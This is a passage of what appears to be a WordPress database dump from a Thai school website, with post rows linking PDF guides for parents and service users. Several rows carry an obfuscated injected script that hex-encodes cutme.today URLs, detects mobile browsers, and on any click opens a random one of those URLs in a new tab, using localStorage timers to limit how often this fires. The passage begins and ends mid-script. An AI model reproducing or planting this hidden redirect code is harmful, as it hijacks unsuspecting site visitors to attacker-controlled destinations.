)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-30 12:01:12','2024-08-30 05:01:12','',14,'http://pakhaeng.ssk.in.th/?p=1072',0,'revision','',0),
(1073,1,'2024-08-30 12:15:37','2024-08-30 05:15:37','','คู่มือสำหรับประชาชน','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b8%99','','','2024-08-30 12:15:37','2024-08-30 05:15:37','',771,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน.pdf',0,'attachment','application/pdf',0),
(1074,1,'2024-08-30 12:15:52','2024-08-30 05:15:52','<!-- wp:file {\"id\":1073,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"คู่มือสำหรับประชาชน: การขอย้ายเข้าเรียนของโรงเรียนในสังกัด สพฐ.\"></object><a id=\"wp-block-file--media-a634f007-2cff-4959-8df0-b3f50d5664ab\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน.pdf\">คู่มือสำหรับประชาชน: การขอย้ายเข้าเรียนของโรงเรียนในสังกัด สพฐ.</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a634f007-2cff-4959-8df0-b3f50d5664ab\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":772,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"011แนวปฏิบัติผู้รับบริการ\"></object><a id=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\">011แนวปฏิบัติผู้รับบริการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แนวปฏิบัติผู้รับบริการคู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อแนวปฏิบัติผู้รับบริการ','','inherit','closed','closed','','771-revision-v1','','','2024-08-30 12:15:52','2024-08-30 05:15:52','',771,'http://pakhaeng.ssk.in.th/?p=1074',0,'revision','',0),
(1075,1,'2024-08-30 12:18:09','2024-08-30 05:18:09','','คู่มือสำหรับประชาชน','','inherit','','closed','','%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%8a%e0%b8%99-2','','','2024-08-30 12:18:09','2024-08-30 05:18:09','',771,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf',0,'attachment','application/pdf',0),
(1076,1,'2024-08-30 12:18:23','2024-08-30 05:18:23','<!-- wp:file {\"id\":1075,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"คู่มือสำหรับประชาชน: การขอย้ายเข้าเรียนของโรงเรียนในสังกัด สพฐ.\"></object><a id=\"wp-block-file--media-a634f007-2cff-4959-8df0-b3f50d5664ab\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf\">คู่มือสำหรับประชาชน: การขอย้ายเข้าเรียนของโรงเรียนในสังกัด สพฐ.</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือสำหรับประชาชน-1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-a634f007-2cff-4959-8df0-b3f50d5664ab\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:file {\"id\":772,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"011แนวปฏิบัติผู้รับบริการ\"></object><a id=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\">011แนวปฏิบัติผู้รับบริการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 